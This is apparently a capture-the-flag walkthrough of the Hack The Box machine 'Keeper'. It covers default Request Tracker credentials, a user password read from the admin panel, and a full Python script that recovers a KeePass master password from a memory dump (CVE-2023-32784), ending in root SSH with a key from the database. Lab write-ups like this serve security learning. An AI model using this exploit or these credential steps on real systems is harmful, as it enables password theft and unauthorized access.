Box: Keeper
Level: Easy
OS: Linux
Let's get started.
Recon
Portscanning
command:sudo nmap -A 10.10.11.227 -T4 -v -p-
Nmap scan report for 10.10.11.227
Host is up (0.22s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3539d439404b1f6186dd7c37bb4b989e (ECDSA)
|_ 256 1ae972be8bb105d5effedd80d8efc066 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=10/6%OT=22%CT=1%CU=38405%PV=Y%DS=2%DC=T%G=Y%TM=651F768
OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=FB%GCD=1%ISR=102%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M539ST11NW7%O2=M539ST11NW7%O3=M539NNT11NW7%O4=M539ST11NW7%O5=M539ST11
OS:NW7%O6=M539ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M539NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)
Uptime guess: 0.697 days (since Thu Oct 5 11:09:39 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=251 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8888/tcp)
HOP RTT ADDRESS
1 298.26 ms 10.10.14.1
2 298.28 ms 10.10.11.227
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Oct 6 03:52:57 2023 -- 1 IP address (1 host up) scanned in 784.92 seconds
The scan shows two open ports: 22, running OpenSSH 8.9p1, and 80, running nginx 1.18.0. Our enumeration will focus on port 80.
Enumeration
Navigate to the webpage. It references the hostname tickets.keeper.htb, so let's add that subdomain to our /etc/hosts file:
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/keeper]
└─$ sudo nano /etc/hosts
[sudo] password for bl4ck4non:
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/keeper]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 bl4ck4non
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.11.227 tickets.keeper.htb
Cool, now let's navigate to that subdomain.
We get a login page. Let's try to log in with default credentials and see what happens:
username: admin
password: password
That didn't work.
Look at the login page closely and you'll see the RT branding. RT is Request Tracker, Best Practical's ticketing system, and its documented default administrator account is root with the password "password". Let's log in with those credentials:
username: root
password: password
Nice, we are logged in.
Browsing the application, I found something interesting. Click Admin > Users > Select and you get the list of accounts.
Among them is a user lnorgaard. Click on that user and you get more information about the account, including a password.
Let's use it to SSH into the server:
username: lnorgaard
password: Welcome2023!
We are in. Now let's escalate our privileges.
Privilege Escalation
Checking the user's home directory, I found a zip file, RT30000.zip.
Copy the file over to your machine (scp works) and unzip it:
┌──(bl4ck4non👽bl4ck4non-sec)-[~/Downloads/HTB/keeper]
└─$ unzip RT30000.zip
Archive: RT30000.zip
inflating: KeePassDumpFull.dmp
extracting: passcodes.kdbx
┌──(bl4ck4non👽bl4ck4non-sec)-[~/Downloads/HTB/keeper]
└─$ ls -la
total 332828
drwxr-xr-x 2 bl4ck4non bl4ck4non 4096 Oct 21 12:54 .
drwxr-xr-x 14 bl4ck4non bl4ck4non 4096 Oct 20 18:16 ..
-rwxr-x--- 1 bl4ck4non bl4ck4non 253395188 May 24 11:51 KeePassDumpFull.dmp
-rw-r--r-- 1 bl4ck4non bl4ck4non 87391651 Oct 21 12:50 RT30000.zip
-rw-r--r-- 1 root root 100 Oct 20 18:20 keeper
-rwxr-x--- 1 bl4ck4non bl4ck4non 3630 May 24 11:51 passcodes.kdbx
A .kdbx file is a KeePass database, used by the KeePass password manager. To open it you need a compatible KeePass client; on Debian-based systems you can install one with the sudo apt install keepassx command.
Opening the database prompts for the master password, and John the Ripper (via keepass2john) could not crack it.
If you recall, the zip also contained a dump file, KeePassDumpFull.dmp, a memory dump of the KeePass process. Looking for a way to use it, I found the KeePass master-password recovery bug (CVE-2023-32784): KeePass 2.x before 2.54 masks the characters typed into the master password box with ●, but for every keystroke it leaves a string of (n-1) bullets followed by the n-th character behind in process memory, so every character except the first can be read back from a memory dump.
You can download the Python proof-of-concept script from here. After downloading, run it against the dump:
command:python3 poc.py -d KeePassDumpFull.dmp
The output contains something like dgr●d med fl●de. A ● marks a position the script could not recover: the first character never is, and here the two ø's are missing as well.
Putting that fragment into Google turns up the Danish dessert rødgrød med fløde.
Using rødgrød med fløde as the master password, I was able to open the KeePass database.
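As an added example (this is not the author's poc.py linked above, nor KeePass code), the following Python script implements the same recovery on its own: it scans a dump for UTF-16LE runs of ● followed by one non-bullet code unit and groups the trailing character by the length of the run, which is its position in the password. It goes one step further than the output shown above in that it also recovers non-ASCII characters such as ø. A real dump cannot ship with the page, so build_fake_dump() is a constructed stand-in that plants the same leftover strings the vulnerable KeePass leaves behind; the script name keepass_leftovers.py is assumed, and passing a path runs it on an actual .dmp.

```python
import re
import sys

# KeePass masks typed master-password characters with U+25CF. The leftover
# .NET strings are UTF-16LE, so every bullet is the byte pair CF 25.
BULLET = "\u25cf"
BULLET_B = BULLET.encode("utf-16-le")      # b"\xcf\x25"

# A run of one or more bullets, not preceded by a bullet, followed by exactly
# one non-bullet UTF-16 code unit (the character typed after that many bullets).
LEFTOVER = re.compile(rb"(?<!\xcf\x25)((?:\xcf\x25)+)(?!\xcf\x25)(..)", re.DOTALL)


def build_fake_dump(password: str, padding: bytes = b"\x00" * 64) -> bytes:
    """Constructed sample (an assumption, not a real dump): emulate the strings
    KeePass 2.x before 2.54 leaves in memory while the master password is typed.
    After the n-th keystroke the text box held (n-1) bullets plus the new
    character, so every keystroke from the second one onward leaks one char."""
    chunks = [padding]
    for n in range(2, len(password) + 1):
        leftover = BULLET * (n - 1) + password[n - 1]
        chunks.append(leftover.encode("utf-16-le"))
        chunks.append(padding)
    return b"".join(chunks)


def recover_candidates(dump: bytes, max_len: int = 64) -> list:
    """Return one set of candidate characters per password position.
    Index 0 is always empty: the first character is only ever stored masked."""
    by_pos = {}
    for m in LEFTOVER.finditer(dump):
        pos = len(m.group(1)) // 2          # number of bullets = position
        if pos >= max_len:
            continue
        try:
            ch = m.group(2).decode("utf-16-le")
        except UnicodeDecodeError:
            continue                        # lone surrogate half, not a typed char
        if ch.isprintable():
            by_pos.setdefault(pos, set()).add(ch)
    length = max(by_pos) + 1 if by_pos else 1
    return [by_pos.get(i, set()) for i in range(length)]


def render(cands: list) -> str:
    """Bullet for an unknown position, the character when there is a single
    candidate, {a,b,...} when the dump holds several for that position."""
    out = []
    for i, s in enumerate(cands):
        if i == 0 or not s:
            out.append(BULLET)
        elif len(s) == 1:
            out.append(next(iter(s)))
        else:
            out.append("{" + ",".join(sorted(s)) + "}")
    return "".join(out)


def recover_from_file(path: str) -> str:
    with open(path, "rb") as f:
        return render(recover_candidates(f.read()))


if __name__ == "__main__":
    if len(sys.argv) == 2:
        print(recover_from_file(sys.argv[1]))        # python3 keepass_leftovers.py KeePassDumpFull.dmp
    else:
        print(render(recover_candidates(build_fake_dump("rødgrød med fløde"))))
```

On the constructed sample this prints ●ødgrød med fløde; only the first character has to be guessed. On a real dump expect several candidates at some positions (other masked strings that happened to sit in memory), which is why the output is rendered as a set per position rather than a single string.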
The database has a Network group; open the entry in it.
It holds the root user's password and also a PuTTY-User-Key-File. The password was rejected when I tried to SSH in as root (sshd is commonly configured to allow only key-based root logins), so let's use the PuTTY key instead.
Save the PuTTY-User-Key-File text, header lines included, in a file, say "bankai.ppk".
We can use puttygen (from the putty-tools package) to convert the .ppk into an OpenSSH private key. Mind the output type: -O private-openssh writes the private key that ssh -i needs, whereas -O public-openssh writes only the public half, a few hundred bytes that cannot authenticate. If the key were passphrase-protected (an Encryption line other than none), puttygen would prompt for the passphrase here.
command:puttygen bankai.ppk -O private-openssh -o bankai.pem
┌──(bl4ck4non👽bl4ck4non-sec)-[~/Downloads/HTB/keeper]
└─$ puttygen bankai.ppk -O private-openssh -o bankai.pem
┌──(bl4ck4non👽bl4ck4non-sec)-[~/Downloads/HTB/keeper]
└─$ chmod 600 bankai.pem
ssh refuses to use a private key that other users can read, hence the chmod 600.
Smooth, now we can SSH into the server as root using the bankai.pem file:
command:ssh -i bankai.pem root@tickets.keeper.htb
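Before converting, it is worth checking what the saved file actually contains. The following Python script is an added example (not the author's code and not part of PuTTY): it parses the .ppk header and the Public-Lines section, which is the public key in SSH wire format, and reports the key type, the RSA modulus size, whether the private half is passphrase-protected (the Encryption line), the OpenSSH-format public line and its SHA256 fingerprint, which you can compare against ssh-keygen -lf run on the converted key. The embedded sample key is constructed for the demo: an arbitrary 960-bit modulus and a placeholder private section, not a real key pair.

```python
import base64
import hashlib
import struct


def _ssh_string(data: bytes) -> bytes:
    """Encode an SSH wire-format string: uint32 big-endian length + bytes."""
    return struct.pack(">I", len(data)) + data


def _mpint(x: int) -> bytes:
    """Encode a non-negative integer as an SSH mpint (leading 0x00 if the high bit is set)."""
    return _ssh_string(x.to_bytes((x.bit_length() + 8) // 8, "big"))


def _read_string(blob: bytes, off: int):
    (n,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + n], off + 4 + n


def parse_ppk(text: str) -> dict:
    """Parse a PuTTY .ppk (v2 or v3): 'Key: value' headers plus the decoded
    Public-Lines and Private-Lines base64 sections."""
    lines = text.strip().splitlines()
    fields, i = {}, 0
    while i < len(lines):
        key, _, val = lines[i].partition(": ")
        i += 1
        if key in ("Public-Lines", "Private-Lines"):
            count = int(val)
            fields[key] = base64.b64decode("".join(lines[i:i + count]))
            i += count
        else:
            fields[key] = val
    return fields


def describe_ppk(text: str) -> dict:
    """Summarise a .ppk: format version, key type, passphrase protection, and the
    OpenSSH public line / SHA256 fingerprint derived from the public blob."""
    f = parse_ppk(text)
    version_key = next(k for k in f if k.startswith("PuTTY-User-Key-File-"))
    blob = f["Public-Lines"]
    ktype, off = _read_string(blob, 0)
    comment = f.get("Comment", "")
    info = {
        "version": int(version_key.rsplit("-", 1)[1]),
        "type": ktype.decode(),
        "encrypted": f.get("Encryption", "none") != "none",   # private half needs a passphrase
        "comment": comment,
        "openssh_public": f"{ktype.decode()} {base64.b64encode(blob).decode()} {comment}".rstrip(),
        "sha256_fingerprint": "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("="),
        "bits": None,
    }
    if ktype == b"ssh-rsa":                 # blob = string "ssh-rsa", mpint e, mpint n
        _e, off = _read_string(blob, off)
        n, _ = _read_string(blob, off)
        info["bits"] = int.from_bytes(n, "big").bit_length()
    return info


def make_sample_ppk(e: int, n: int, comment: str) -> str:
    """Constructed sample for the demo: a v3 file with an unencrypted RSA public
    blob and a placeholder private section (not real key material)."""
    pub = _ssh_string(b"ssh-rsa") + _mpint(e) + _mpint(n)
    pub_b64 = base64.b64encode(pub).decode()
    pub_lines = [pub_b64[i:i + 64] for i in range(0, len(pub_b64), 64)]
    priv_b64 = base64.b64encode(b"placeholder-private-section").decode()
    return "\n".join(
        ["PuTTY-User-Key-File-3: ssh-rsa", "Encryption: none", f"Comment: {comment}",
         f"Public-Lines: {len(pub_lines)}", *pub_lines,
         "Private-Lines: 1", priv_b64,
         "Private-MAC: 00"]
    ) + "\n"


# Arbitrary modulus for the demo (assumption): 40 repeats of C0FFEE give 960 bits.
SAMPLE_PPK = make_sample_ppk(65537, int("C0FFEE" * 40, 16), "rsa-key-demo")

if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) == 2 else SAMPLE_PPK
    for k, v in describe_ppk(text).items():
        print(f"{k}: {v}")
```

Run it with the saved bankai.ppk as the argument. If "encrypted" is True, expect a passphrase prompt from puttygen; after conversion, ssh-keygen -lf bankai.pem should print the same SHA256 fingerprint, which confirms the private key you are about to use belongs to the public key from the database entry.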
Nice, we got a root shell and have successfully pwned this box.
That will be all for today